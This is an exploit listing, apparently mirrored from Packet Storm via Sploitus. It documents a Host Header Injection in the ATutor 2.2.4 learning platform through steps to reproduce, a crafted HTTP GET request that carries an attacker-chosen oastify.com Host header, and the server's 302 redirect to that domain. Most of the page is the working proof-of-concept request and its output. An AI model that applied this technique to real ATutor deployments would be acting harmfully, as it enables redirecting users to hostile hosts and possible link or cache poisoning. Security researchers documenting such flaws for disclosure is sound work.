Share
## https://sploitus.com/exploit?id=PACKETSTORM:188885
# Exploit Title: Host Header Injection - atutorv2.2.4
    # Date: 01/2025
    # Exploit Author: Andrey Stoykov
    # Version: 2.2.4
    # Tested on: Ubuntu 22.04
    # Blog:
    https://msecureltd.blogspot.com/2025/01/friday-fun-pentest-series-18-host.html
    
    Description:
    
    - It was found that the application had a Host Header Injection
    vulnerability.
    
    
    Host Header Injection #1:
    
    Steps to Reproduce:
    
    1. Visit specific page of the application
    2. Intercept the HTTP GET/POST request
    3. Modify the Host header to a domain of attackers choice
    4. Forward the HTTP request
    
    // HTTP GET request
    
    GET /atutor/bounce.php?course=0 HTTP/1.1
    Host: yz13ej73z3j9dnnv3rt0yxqeg5mwauyj.oastify.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0)
    Gecko/20100101 Firefox/135.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: http://192.168.1.110/atutor/login.php
    Connection: keep-alive
    Cookie: ATutorID=oukcasgb86k60mefasc36joje4; flash=no
    Upgrade-Insecure-Requests: 1
    Priority: u=0, i
    
    
    // HTTP response
    
    HTTP/1.1 302 Found
    Date: Thu, 09 Jan 2025 18:55:35 GMT
    Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev
    Perl/v5.16.3
    X-Powered-By: PHP/5.6.40
    Set-Cookie: ATutorID=nl8ahpeo2tsd0mc4d2a0br4a94; path=/atutor/; HttpOnly
    Set-Cookie: ATutorID=nl8ahpeo2tsd0mc4d2a0br4a94; path=/atutor/; HttpOnly
    Set-Cookie: flash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0
    Set-Cookie: nexthelp_cookie=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT;
    Max-Age=0; path=/
    Location:
    http://yz13ej73z3j9dnnv3rt0yxqeg5mwauyj.oastify.com/atutor/login.php
    Vary: Accept-Encoding
    Content-Length: 0
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=utf-8